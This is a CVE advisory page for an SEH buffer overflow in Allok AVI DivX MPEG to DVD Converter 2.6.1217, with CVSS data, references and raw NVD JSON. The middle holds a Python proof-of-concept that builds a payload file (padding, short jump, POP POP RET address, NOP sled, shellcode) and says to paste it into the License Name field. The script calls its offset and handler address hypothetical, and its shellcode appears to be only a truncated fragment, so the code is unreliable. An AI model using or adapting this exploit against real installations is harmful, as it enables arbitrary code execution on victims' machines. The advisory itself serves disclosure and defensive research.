CVE-2018-25323

Description

Allok AVI DivX MPEG to DVD Converter 2.6.1217 contains a structured exception handler buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious payload. Attackers can craft a text file with a specially crafted buffer containing shellcode and SEH chain overwrite values, then paste the contents into the License Name field to trigger code execution.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Allok AVI DivX MPEG to DVD Converter 2.6.1217

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2018-25323
# Generates a malicious payload to trigger SEH overflow

import struct

# 1. Construct the payload
# Offset to reach SEH record (Hypothetical value, requires debugging)
offset = b"A" * 4108 

# Next SEH: Short jump (6 bytes) to skip the SEH handler and land on shellcode
next_seh = b"\xeb\x06\x90\x90"

# SE Handler: Address of POP POP RET instruction (Universal or specific to module)
# This address is hypothetical for demonstration
seh_handler = struct.pack('<L', 0x1001AE61) 

# NOP sled
nop_sled = b"\x90" * 16

# Shellcode: Sample calc.exe shellcode (windows/exec CMD=calc.exe)
shellcode = b"\xd9\xc3\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"

# Padding to fill remaining buffer space
padding = b"C" * 500

payload = offset + next_seh + seh_handler + nop_sled + shellcode + padding

# 2. Write payload to file
try:
    with open("CVE-2018-25323_exploit.txt", "wb") as f:
        f.write(payload)
    print("[+] Exploit file generated successfully: CVE-2018-25323_exploit.txt")
    print("[+] Instruction: Copy contents of the file and paste into the 'License Name' field.")
except Exception as e:
    print(f"[-] Error generating file: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25323
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25323
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25323/
[4] VulDB https://vuldb.com/cve/CVE-2018-25323
[5] https://www.exploit-db.com/exploits/44363
[6] https://www.vulncheck.com/advisories/allok-avi-divx-mpeg-to-dvd-converter-buffer-overflow-seh

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25323", "sourceIdentifier": "[email protected]", "published": "2026-05-17T13:16:43.663", "lastModified": "2026-05-18T17:29:53.643", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Allok AVI DivX MPEG to DVD Converter 2.6.1217 contains a structured exception handler buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious payload. Attackers can craft a text file with a specially crafted buffer containing shellcode and SEH chain overwrite values, then paste the contents into the License Name field to trigger code execution."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/44363", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/allok-avi-divx-mpeg-to-dvd-converter-buffer-overflow-seh", "source": "[email protected]"}]}}